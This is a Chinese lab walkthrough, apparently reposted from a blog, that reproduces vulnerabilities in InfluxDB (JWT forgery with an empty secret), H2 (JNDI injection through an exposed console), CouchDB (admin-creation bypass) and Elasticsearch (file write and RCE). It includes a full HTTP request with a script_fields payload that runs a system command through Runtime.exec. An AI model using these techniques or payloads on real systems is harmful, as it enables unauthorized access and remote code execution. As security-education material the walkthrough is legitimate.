服务攻防-数据库安全-InfluxdbH2databaseCouchDBElasticSearch数据库漏洞复现

news2024/9/25 1:16:30

目录

一、Influxdb-未授权访问-Jwt 验证不当

1、Infuxdb简介

2、安全问题

3、漏洞复现 

二、H2database-未授权访问-配置不当

1、H2database简介

2、安全问题

3、漏洞复现 

三、CouchDB-权限绕过配合RCE-漏洞

1、CouchDB简介

2、安全问题

3、漏洞复现 

四 、ElasticSearch-文件写入&RCE-漏洞

1、ElasticSearch简介

2、漏洞复现-1

3、漏洞复现-2

五、数据库安全总结导图


一、Influxdb-未授权访问-Jwt 验证不当

1、Infuxdb简介

        默认端口:8086    8088。

        InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。

        InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。

        InfluxDB 的一些主要特点包括:

  • 高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。

  • 数据保留策略:InfluxDB 允许用户设置数据保留策略,自动过期旧数据,有助于管理数据库大小和提高性能。

  • 标记和过滤:InfluxDB 支持标记,它们是键值对,可用于过滤和分组分析数据。

  • 连续查询:InfluxDB 允许用户定义连续查询,在后台运行并自动从原始数据计算聚合值。

  • InfluxDB Cloud:除了开源版本的 InfluxDB 外,还有一个名为 InfluxDB Cloud 的云托管版本,提供完全托管、可扩展的数据库即服务解决方案。

        总的来说,InfluxDB 是管理和分析时间序列数据的强大工具,在金融、医疗保健和物联网等各个行业得到广泛应用。

2、安全问题

        当用户开启了认证但未设置参数 shared-secret 时,InfluxDB会使用一个空字符串作为认证密钥来对JWT进行签名和验证。这种情况下,攻击者可以使用伪造的JWT来模拟任何用户身份,并在InfluxDB中执行SQL语句,这可能导致严重的安全问题。

3、漏洞复现 

        启动靶场环境。

        扫描环境端口,可以看到8086端口处于开启状态。

        直接在网上搜索influxdb的漏洞,就可以看到很多复现教程。

        我们打开网站并在其末尾添加下图所示内容,访问后可以看到下面的页面。

        访问下面的路径后并以post的方式上传下面的参数后会弹出一个登录框,也就是说这个操作是需要登陆后经过授权才可以执行的。

        当我们什么也不输入的时候网页会报下面的错误。

        由于其存在未授权访问漏洞,并且这个未授权访问采用的是jwt,所以可以模拟jwt来生成一个用户为admin用户,并且exp时间戳(代表着这个token的过期时间)大于当前时间的token。 

        将下面的内容在“JSON Web Tokens - jwt.io”内进行加密,并且让密钥为空。

        将上面生成出来的密钥复制,然后粘贴到数据包内。

        将数据包发送出去之后可以看到成功查询到了数据。

二、H2database-未授权访问-配置不当

1、H2database简介

        默认端口:20051 。 

        H2database是一个开源的Java嵌入式关系型数据库管理系统(RDBMS),具有轻量级、高性能、易于使用等特点。它支持标准的SQL语言和JDBC API,可以在内存或者磁盘上存储数据,同时提供了高级特性如事务管理、索引、触发器、存储过程等。

        H2database的特点包括:

  • 嵌入式:H2database可以嵌入到Java应用程序中,因此不需要独立的数据库服务器或者额外的配置,使得应用程序更加易于部署和管理。

  • 高性能:H2database被设计为轻量级数据库,因此具有非常高的性能,可以处理大量的数据操作。

  • 支持多种模式:H2database支持多种不同的模式,包括内存模式、磁盘模式、混合模式等,可以根据具体的应用场景选择最适合的存储方式。

  • 兼容性:H2database完全支持标准的SQL语言和JDBC API,因此可以方便地与其他数据库系统集成。

  • 可扩展性:H2database支持事务管理、索引、触发器、存储过程等高级特性,同时还支持使用Java代码编写自定义的函数和存储过程,因此非常灵活和可扩展。

        总的来说,H2database是一个功能丰富、易于使用、高性能的Java嵌入式关系型数据库管理系统,适用于各种不同的应用场景,包括移动应用、桌面应用、Web应用等。

2、安全问题

        H2 database自带一个Web管理页面,可以通过浏览器来访问和管理数据库。

        在Spring开发中,如果将以下选项设置为true,则可以允许外部用户访问Web管理页面,且不进行身份验证:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

        spring.h2.console.enabled选项用于启用H2 database的Web管理页面;

        spring.h2.console.settings.web-allow-others选项用于允许外部用户访问该页面。

        如果这两个选项开启则会使得Web管理页面变得容易受到攻击,利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。

3、漏洞复现 

        启动靶场环境。

        下载 JNDI-Injection-Exploit——https://github.com/welk1n/JNDI-Injection-Exploit.git。


补充:

        JNDI注入是一种攻击方式,它可以利用Java命名和目录接口(JNDI)来执行远程命令执行(RCE)攻击。攻击者可以利用JNDI注入来将恶意的JNDI对象注入到目标应用程序中,并使其在应用程序尝试使用该JNDI对象时执行恶意代码。

        在使用JNDI注入进行攻击时,可以使用一些工具来自动生成恶意JNDI对象并将其注入到目标应用程序中。其中,JNDI-Injection-Exploit是一个自动化工具,它可以利用JNDI注入漏洞执行远程命令执行攻击。

        -C - 远程class文件中要执行的命令。

        -A - 服务器地址,可以是IP地址或者域名。


        下载到桌面上运行后来生成JNDI链接。

        将链接复制后打开控制终端,可以看到需要进行登陆。

        先查看服务器当前的目录。

        将下图所示的两个框内的内容更改成下面的内容。

        点击“Connect”。

        再次查看服务器的目录,发现没有任何变化。

        查看监听状态发现也没有监听到任何内容。

        这是什么原因呢?

        是因为这个jar包在进行攻击的时候是远程去调用的,但是我们是在本地去监听,所以服务器上就不会有新增内容,所以需要使用一台外网的主机来对其进行监听才会成功。

        使用外网主机再次生成并监听,将其进行复制。

        再次粘贴到指定位置后,点击“Connect”。

        此时就可以看到成功监听到了内容。

        文件目录也成功多出了一个文件。

三、CouchDB-权限绕过配合RCE-漏洞

1、CouchDB简介

        默认端口:5984。 

        CouchDB是一个面向文档的NoSQL数据库,采用JSON作为文档数据格式,并使用RESTful API提供数据访问接口。以下是CouchDB的一些特点和优势:

  • 分布式数据库:CouchDB是一个分布式数据库,支持多节点复制和同步,可以在不同的服务器之间实现数据备份和恢复。
  • 面向文档:CouchDB采用面向文档的数据模型,每个文档都是一个自包含的数据结构,可以存储任意类型的数据,无需遵循固定的表结构。
  • RESTful API:CouchDB使用RESTful API提供数据访问接口,支持HTTP协议,可通过简单的HTTP请求进行数据操作。
  • MapReduce视图:CouchDB使用MapReduce视图来处理和查询数据,可以在不同的文档之间进行关联查询和聚合计算。
  • ACID事务支持:CouchDB支持ACID事务特性,可以保证数据的一致性、可靠性和可恢复性。
  • 可扩展性:CouchDB具有良好的可扩展性和灵活性,可以根据需要进行水平和垂直扩展。
  • 开源免费:CouchDB是一款开源免费的数据库软件,可以在各种平台上免费使用和修改。

        CouchDB适用于需要存储和处理非结构化数据的应用场景,例如Web应用、移动应用、社交网络和协同办公等。由于CouchDB具有良好的可扩展性和分布式特性,因此也适用于需要处理大规模数据和高并发请求的应用场景。

2、安全问题

        由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

3、漏洞复现 

        启动靶场环境。

        访问后可以看到下面的页面。

        抓取数据包将数据包更改成下面的样式,可以看到此时是失败的。

        将数据包再次进行修改,发送包含两个roles的数据包,即可绕过限制,可以看到这时成功了,此时就成功创建了管理员账户,账户名和密码均为“vulhub”。

        进入下面的地址,输入账号和密码后点击登陆。

        可以看到成功登陆进去了。

四 、ElasticSearch-文件写入&RCE-漏洞

1、ElasticSearch简介

        默认端口:9200    9300。 

        Elasticsearch是一个基于Lucene的搜索引擎,也是一个分布式文档存储和分析引擎。以下是Elasticsearch的一些特点和优势:

  • 分布式架构:Elasticsearch采用分布式架构,可以在多个节点上存储和处理数据,支持数据水平扩展。
  • 实时搜索:Elasticsearch提供实时搜索和分析功能,可以在毫秒级别内返回搜索结果。
  • 多数据源支持:Elasticsearch支持多种数据源,包括结构化数据和非结构化数据,可以存储和处理各种类型的数据。
  • 全文搜索:Elasticsearch采用全文搜索引擎技术,支持文本分词、近似匹配和聚合分析等功能。
  • RESTful API:Elasticsearch提供RESTful API接口,可以通过HTTP请求进行数据操作和查询。
  • 大数据处理:Elasticsearch支持大规模数据的存储和处理,可以处理PB级别的数据。
  • 实时监控和分析:Elasticsearch提供实时监控和分析功能,可以对数据进行实时监控和分析,帮助用户快速发现问题和解决问题。
  • 开源免费:Elasticsearch是一款开源免费的软件,可以在各种平台上免费使用和修改。

        Elasticsearch适用于需要搜索、分析和处理大量数据的应用场景,例如日志分析、搜索引擎、电商网站、社交网络和物联网等。由于Elasticsearch具有良好的可扩展性和分布式特性,因此也适用于需要处理大规模数据和高并发请求的应用场景。

2、漏洞复现-1

        在在线靶场内找到对应环境。

        启动环境。

        9200一般为ElasticSearch的常用端口,此漏洞环境需要与中间件使用。

        发现9200端口存在elasticsearch页面,8080存在tomcat目录

        利用ElasticSearch写入后门至usr/local/tomcat/webapps/wwwroot/


        移动路径。

        配置。

        访问对应地址,使用参数f控制要写入的内容。

        访问对应路径,可以看到参数成功写入了。

3、漏洞复现-2

        在在线靶场内找到对应环境并启动。

        首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。

        访问靶场地址后抓取数据包。

        将数据包更改成下面的样式并放包。

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

        再将数据包更改成下面的样式,放包,可以看到成功执行了对应的命令。

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

五、数据库安全总结导图


此篇文章接上篇文章:https://blog.csdn.net/weixin_62808713/article/details/130444142


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/498198.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

《程序员面试金典(第6版)》面试题 16.15. 珠玑妙算

题目描述 珠玑妙算游戏(the game of master mind)的玩法如下。 计算机有4个槽,每个槽放一个球,颜色可能是红色(R)、黄色(Y)、绿色(G)或蓝色(B&…

为什么我选择订阅ChatGPT Plus计划?

自从ChatGPT诞生以来,它的强大功能和表现一直备受好评。作为一个长期使用者,我一直对其性能和智能感到惊叹。最近,我决定升级我的用户体验,订阅了ChatGPT Plus计划。在这篇博客中,我将向您详细介绍ChatGPT Plus的优势和…

c语言那些有趣的事 -- 猜数字游戏

📕博主介绍:目前大一正在学习c语言,数据结构,计算机网络。 c语言学习,是为了更好的学习其他的编程语言,C语言是母体语言,是人机交互接近底层的桥梁。 本章用循环去写一些题目。 让我们开启c语言…

细谈抽象类

目录 抽象类 1.抽象类是被abstract修饰的类 2.抽象类中的抽象方法 3.抽象类中可以有和普通类一样的成员变量和成员方法 4.抽象类不能被实例化 5.那么抽象类不能被实例化要它有何用??? 6.注意: 抽象类 如果一个类中没有包含足…

基于Open3D的点云处理4-旋转、平移、缩放

三维变换主要包括:平移、旋转、缩放 在open3d中,针对三维对象的变换主要有translate、rotate、scale和transform • Translate 平移 • Rotate 旋转 • Scale 缩放 • Transform 变换矩阵(4*4) mesh_tx mesh.translate((1.5, …

昆山杜克大学首届毕业生就业情况

昆山杜克大学本科教育以通识博雅课程和跨学科教育为主要特色,倡导文理兼修,并以研究为导向。所有学生入学时不分专业,他们充分地自由选课探索之后,于大二结束之前选择最适合自己的专业。首届毕业生分布于以下12个专业。 教育理念是…

《SQLi-Labs》03. Less 11~15

sqli Less-11知识点题解 Less-12题解 Less-13题解 Less-14题解 Less-15知识点题解 sqli。开启新坑。 Less-11 知识点 第十一关页面发生了变化,是账户登录页面。那么注入点在输入框。 前十关使用的是 get 请求,参数都体现在 url 上,而十一关…

测试2:基础

目录 1.软件测试的生命周期 2.描述BUG 3.定义bug的级别 1.Blocker(崩溃) 2.Critical(严重) 3、Major(一般): 4、Minor(次要): 4.BUG的生命周期 1.软件测试的生命周期 需求分析,测试计划,测试设计,测…

实施CRM目标有哪几步?如何制定CRM目标?

在当今竞争激烈的商业环境中,与客户建立持久的关系是企业重要的工作。CRM客户管理系统能有效帮助企业管理优化流程、管理客户,提高销售成功率,推动收入增长。那么您了解如何实施CRM吗?下面说说实施CRM目标是什么,如何设…

Python小姿势 - # 字典(Dictionary)

字典(Dictionary) 字典是另一种可变容器模型,且可存储任意类型对象。 字典的每个键值 keyvalue 对用冒号 : 分割,每个对之间用逗号 , 分割,整个字典包括在花括号 {} 中 ,格式如下所示: d {key1 : value1, …

CSDN 周赛 50 期

CSDN 周赛 50 期 1、题目名称:订班服2、题目名称:异或和3、题目名称:零钱兑换4、题目名称:小艺照镜子小结 1、题目名称:订班服 小A班级订班服了! 可是小A是个小糊涂鬼,整错了好多人的衣服的大小…

2022年NOC大赛编程马拉松赛道复赛图形化高年级A卷-正式卷,包含答案

目录 单选题: 多选题: 编程题: 下载打印文档做题: 2022年NOC大赛编程马拉松赛道复赛图形化高年级A卷-正式卷,包含答案 单选题:<

搭建Linux依赖环境

目录 1、jdk&#xff08;基于yum进行安装 &#xff09; 2、Tomcat &#xff08;手动下载安装&#xff09; 3、MariaDB&#xff08;基于yum进行安装&#xff09; 安装 启动 测试连接 1、jdk&#xff08;基于yum进行安装 &#xff09; 可以使用yum list | grep [关键词…

js基础1

一.js中的变量 a.var,let ,const的异同 1.var var在不进行初始化的条件下的值为undefined,它的作用域是函数作用域&#xff0c;在使用var在函数的内部定义一个变量的时候&#xff0c;意味着该变量在退出前进行销毁。并且它可以进行变量提升。 例子&#xff1a; function f…

操作系统概述(一、并发)

系列文章目录 文章目录 系列文章目录前言定义 一、操作系统发展史1940s的程序1950s的计算机1960s的计算机1970s 基本和现代一样了 others 二、程序状态模型从不同视角看程序&#xff1a; 操作系统上的程序 三、线程库四、程序并发五、自旋锁与互斥锁的实现自旋锁的使用场景 六、…

21 brk 的初始化

前言 这个问题是 衍生自 malloc 的问题的调试 malloc 虚拟内存分配的调试(1) malloc 虚拟内存分配的调试(2) 假设我们使用 gdb 或者 gdbserver 启动调试的该测试用例对应的可执行程序 我们可以观察到的现象是 p1, p2, p3 的地址是固定的, 均是类似于 elf 中最大的虚拟地…

基于vue3+pinia2仿ChatGPT聊天实例|vite4.x仿chatgpt界面

使用vue3pinia2开发仿制chatgpt界面聊天实例Vue3-Chatgpt 基于Vue3.xPinia2VueRouterVue3-Markdown等技术构建仿ChatGPT网页端聊天程序。支持经典分栏界面布局、light/dark模式、全屏半屏显示、Markdown语法解析、侧边栏隐藏等功能。 技术框架 编辑工具&#xff1a;Cursor框架…

精炼计算机网络——物理层(二)

文章目录 前言2.4信道复用技术2.4.1 频分复用、时分复用和统计时分复用2.4.2 波分复用2.4.3 码分复用 2.5 数字传输系统2.6 带宽接入技术2.6.1 ADSL技术2.6.2 光纤同轴混合网&#xff08;HFC网&#xff09;2.6.3 FTTx技术 总结 前言 上篇文章&#xff0c;我们初步了解了物理层…

国考省考结构化面试:应急应变事件处理,宏观全面把控,措施有效具体,着眼当前放眼未来,标本兼治

国考省考结构化面试&#xff1a; 2022找工作是学历、能力和运气的超强结合体! 公务员特招重点就是专业技能&#xff0c;附带行测和申论&#xff0c;而常规国考省考最重要的还是申论和行测&#xff0c;所以大家认真准备吧&#xff0c;我讲一起屡屡申论和行测的重要知识点 遇到寒…

idea 创建java项目,引入第三方jar,打包jar包

目录 一、新建并运行项目二、下载第三方Jar三、引入第三方Jar四、将项目打成Jar包 一、新建并运行项目 前提&#xff1a;已安装好JDK&#xff0c;并且配置好了JDK环境变量。 直接点击create创建即可 刚创建完的项目可能是没有out目录的&#xff0c;当我们执行一次main方法&…